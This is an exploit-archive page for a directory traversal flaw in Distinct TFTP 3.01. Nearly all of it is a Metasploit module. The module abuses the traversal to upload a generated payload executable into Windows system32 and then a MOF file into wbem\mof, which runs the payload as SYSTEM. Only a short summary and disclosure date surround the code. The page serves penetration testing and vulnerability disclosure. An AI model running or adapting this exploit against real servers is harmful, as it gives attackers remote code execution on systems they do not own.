Distinct TFTP Writable Directory Traversal Execution Exploit

Summary

Distinct TFTP 3.01 Writable suffers from directory traversal execution vulnerability.

Credit:

Details

Vulnerable Systems:
 * Distinct TFTP 3.01

require ‘msf/core’

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Rex::Proto::TFTP
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec

def initialize(info={})
super(update_info(info,
‘Name’ => ‘Distinct TFTP 3.01 Writable Directory Traversal Execution’,
‘Description’ => %q{
This module exploits a vulnerability found in Distinct TFTP server. The
software contains a directory traversal vulnerability that allows a remote
attacker to write arbitrary file to the file system, which results in
code execution under the context of ‘SYSTEM’.
},
‘License’ => MSF_LICENSE,
‘Author’ =>
[
‘modpr0be’, #Initial discovery, PoC (Tom Gregory)
‘sinn3r’ #Metasploit
],
‘References’ =>
[
[‘OSVDB’, ‘80984’],
[‘EDB’, ‘18718’],
[‘URL’, ‘http://www.spentera.com/advisories/2012/SPN-01-2012.pdf’]
],
‘Payload’ =>
{
‘BadChars’ => ‘x00’,
},
‘DefaultOptions’ =>
{
‘ExitFunction’ => ‘none’
},
‘Platform’ => ‘win’,
‘Targets’ =>
[
[‘Distinct TFTP 3.01 on Windows’, {}]
],
‘Privileged’ => false,
‘DisclosureDate’ => ‘Apr 8 2012’,
‘DefaultTarget’ => 0))

register_options([
OptInt.new(‘DEPTH’, [false, ‘Levels to reach base directory’,10]),
OptAddress.new(‘RHOST’, [true, ‘The remote TFTP server address’]),
OptPort.new(‘RPORT’, [true, ‘The remote TFTP server port’, 69])
], self.class)
end

def upload(filename, data)
tftp_client = Rex::Proto::TFTP::Client.new(
‘LocalHost’ => ‘0.0.0.0’,
‘LocalPort’ => 1025 + rand(0xffff-1025),
‘PeerHost’ => datastore[‘RHOST’],
‘PeerPort’ => datastore[‘RPORT’],
‘LocalFile’ => ‘DATA:#{data}’,
‘RemoteFile’ => filename,
‘Mode’ => ‘octet’,
‘Context’ => {‘Msf’ => self.framework, ‘MsfExploit’ => self },
‘Action’ => :upload
)

ret = tftp_client.send_write_request { |msg| print_status(msg) }
while not tftp_client.complete
select(nil, nil, nil, 1)
tftp_client.stop
end
end

def exploit
peer = ‘#{datastore[‘RHOST’]}:#{datastore[‘RPORT’]}’

# Setup the necessary files to do the wbemexec trick
exe_name = rand_text_alpha(rand(10)+5) + ‘.exe’
exe = generate_payload_exe
mof_name = rand_text_alpha(rand(10)+5) + ‘.mof’
mof = generate_mof(mof_name, exe_name)

# Configure how deep we want to traverse
depth = (datastore[‘DEPTH’].nil? or datastore[‘DEPTH’] == 0) ? 10 : datastore[‘DEPTH’]
levels = ‘../’ * depth

# Upload the malicious executable to C:WindowsSystem32
print_status(‘#{peer} – Uploading executable (#{exe.length.to_s} bytes)’)
upload(‘#{levels}WINDOWS\system32\#{exe_name}’, exe)

# Let the TFTP server idle a bit before sending another file
select(nil, nil, nil, 1)

# Upload the mof file
print_status(‘#{peer} – Uploading .mof…’)
upload(‘#{levels}WINDOWS\system32\wbem\mof\#{mof_name}’, mof)
end
end

Disclosure Timeline:
Published: 2012-05-12

Categories: Exploits